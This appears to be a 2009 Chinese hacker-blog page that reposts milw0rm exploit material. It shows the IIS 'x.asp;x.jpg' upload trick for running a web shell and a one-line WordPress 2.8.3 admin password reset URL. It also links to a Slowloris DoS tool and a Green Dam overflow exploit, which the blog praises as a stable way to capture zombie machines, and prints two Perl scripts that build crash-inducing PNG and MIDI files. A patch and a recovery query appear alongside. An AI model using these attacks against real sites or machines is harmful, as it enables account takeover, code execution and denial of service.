风雪居

这个出来有几天了  偶又后知后觉才知道
当上传图片为x.asp;x.jpg时，IIS会自动解析为asp格式，可以说是IIS只认;符号前面的文件解析

所以我们只要上传后是x.asp;x.jpg这样的形式，就可以执行我们的马了，测试了下，x.php;x.jpg也是可以执行的。

咳，刚用上没几天就出现个漏洞，不大不小，出现了却让你十分头疼。文章内容

来自
http://www.milw0rm.com/exploits/9410 我大致翻译下

=============================================
- 漏洞发布日期: 2009/08/10
- 发现者: Laurent Gaffié(他这个是什么E？)
- 严重程度: 中等(我靠 还中等 无聊的人一直重置你密码 你就甭想更新博客了)
=============================================

漏洞名称
————————-
WordPress <= 2.8.3 Remote admin reset password
WordPress 远程任意重置管理员密码 2.8.3(包括)一下版本通杀

漏洞描述

正常情况下我们必须知道用户名或者管理的电子邮件才可以重置，重置后你的邮

箱将会收到一封重置密码的连接

譬如

http://blog.tkbbs.com/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

我们来看看出现漏洞的页面源代码：

wp-login.php:
186行

function reset_password($key) {
global $wpdb;

$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users

WHERE user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

276行

$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’;
$errors = new WP_Error();

if ( isset($_GET['key']) )
$action = ‘resetpass’;

// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’,

‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false

=== has_filter(‘login_form_’ . $action) )
$action = ‘login’;

370行

break;

case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}

wp_redirect(‘wp-login.php?action=lostpassword&error=invalidkey’);
exit();

break;

从上你可以看出你可以滥用密码重置功能，并绕过用户名(电子邮箱地址)验证,
然后直接重设代表管理密码的$key 关键变量。

利用方法

/wp-login.php?action=rp&key[]=
管理密码将无确认直接充值成随机密码

任何浏览者都可以利用此链接重置管理员密码
WordPress 2.8.3(包括)及以下全线阵亡。。

补丁？

哦 上帝  WordPress还没出现补丁包

我这里提供我的好友 一想千开提供的办法 在此感谢
以下是他的分析：
key[] 时
PHP会认为KEY是一个数组
我们可以判断KEY是不是数组
是数组 终止执行或者提示
这样就O了
搜索wp-login.php文件
require( dirname(__FILE__) . ‘/wp-load.php’ );
下面增加
if (is_Array($_GET["key"])){
exit();
}

OK 收工

如果你不幸中招怎么办？

登陆你的phpadmin吧
输入SQL查询语句

UPDATE `你的数据库名`.`wp_users` SET `user_pass` = ’32位的MD5加密’

WHERE `wp_users`.`ID` =1 LIMIT 1 ;

你可以到一些提供MD5在线加密的网站把你的密码加密后 在复制到查询器查询更

新。然后你就可以用你的新密码登陆了

Apache中的一个严重漏洞将使得拒绝服务攻击（DoS）变得异乎简单。Apache 1.x，2.x，dhttpd，GoAhead WebServer和Squid确认都受到影响；IIS6.0，IIS7.0和lighttpd未被波及。Apache基金会目前还没有发布补丁。
ha.ckers公开的Slowloris代码允许对一台特定的服务器发动缓慢的拒绝访问攻击，而不是用堵塞整个网络，它能让一台机器攻陷了另一台机器的 web server，只需使用极少的带宽，对不相关的服务和端口的副效应降到最低。拒绝服务的理想攻击情况是除了webserver不可访问之外，其它服务都完整无缺。Slowloris便源自这个理念，相比大多数攻击方法它更隐蔽。Slowloris首先发送一个不完整的HTTP请求，打开连接，然后每隔一段时间发送剩余的header，以保证通讯端不被关闭，于是webserver的一个线程便被占用了。由于webserver允许的线程数量是有限制的，因此Slowloris会缓慢的消耗掉所有的通讯端口。Slowloris是一个Perl程序，需要Perl解释器才能运行。
访问ha.ckers:http://ha.ckers.org/slowloris/
漏洞利用文件下载: slowloris.pl

Green Dam remote buffer overflow exploit
“Green Dam” is a software used for monitoring and anti-pornography, popularizing by
Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser
process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the
browser process.
This exploit can be used for exploitation on IE, on those computers installed Green Dam.
I used the .net binary to deploy shellcode, for it`s more stable than Heap Spray, and able
to bypass DEP and ASLR on Vista.
The exploit page contains a .net control, so it should be published on IIS.
—seer[N.N.U]

http://milw0rm.com/sploits/2009-green-dam.zip

# milw0rm.com [2009-06-12]
我试着翻译下。。
绿坝远程缓冲区溢出漏洞
“绿坝”是一个中国政府推广的用于监测和反色情的软件。
在7月1日，新电脑都得预装这份软件。
现在已经有5000万台电脑使用它。
为了监测用户输入的URL地址，绿坝注入了浏览器进程。
而当绿坝试图处理长URL， 浏览器进程将出堆栈溢出。
这个漏洞适用于安装了绿坝电脑的IE浏览器。
我用了.net binary配置的shellcode,因为它能使Heap Spray更加稳定
并能绕过的DEP硬件保护和Vista操作系统的ASLR技术上。
这里我们公布该漏洞利用程序下载

http://milw0rm.com/sploits/2009-green-dam.zip

—seer[N.N.U]
[color=Red]点评:稳定的肉鸡获取方式

DirectShow 0day是一个中率极高的0day漏洞，目前已经开始在网上爆发，其攻击形势不亚于去年的IE7 0day以及往年的ANI 0day。
攻击特性如下：
1.使用了.NET SHELLCODE技术，机器上装有.net framework就会中招。
2.利用XP自带的Windows Media Player播放漏洞媒体文件触发。
解决方案：
目前微软没有补丁，只提供了临时解决方案，为了防止0DAY攻击，请使用360提供的打包程序 解决漏洞。
http://dl.360safe.com/360safefixavi.exe
1号就发布了-。- 不过给疏忽了 影响重大 还是发出来吧

信息来源：milw0rm.com
[code]#! /usr/bin/perl
#CAL_gdiplug_poc.pl
#
# Mircosoft_gdiplug_png_infinity_loop_D.o.S POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
#
#Affected
#========
#test on full updated winxp sp3
#other version should be affected
#
#CVE: please assign to a CVE number
#
#DESCRIPTION
#===========
#
# The vulnerability exists within the code in MicroSoft Gdi+ processing crafted png file. that cause infinity loop to cause high CPU(100%) and D.o.S .
#
#
#ANALYSIS
#========
#
# png chunk
#
# {
# DWORD btChunkLen;
# CHAR btChunkType[4];
#} CHUNK_HEADER;
#if btChunkLen is 0xfffffff4, would cause code fall into infinity loop
#
open(Fin, ">poc.png") || die "can't create crash sample.$!";
binmode(Fin);
$data =
"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52" .
"\x00\x00\x03\x00\x00\x00\x04\x00\x08\x02\x00\x00\x00\xd9\x44\xa9" .
"\x57\xff\xff\xff\xf4\x41\x41\x41\x41\x62\x01\x08\xcb\x06\x49\x3e" .
"\xd7\x0a\x00\x22\xe3\xf1\x32\x3e\xe8";
print Fin $data;
close(Fin);[/code]

转载自：milw0rm.com
[code]#! /usr/bin/perl
#
# Windows Media Player (.mid file) Integer Overflow PoC
# By HuoFu
#
# Test Windows Media Player. Ver: 11.0.5721.5260
#
open(Fin, ">crash.mid") || die "can't create crash sample.$!";
$data = "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
"\x00\xff\x2f\x00";
print Fin $data;
close(Fin);[/code]
有PER环境的试下吧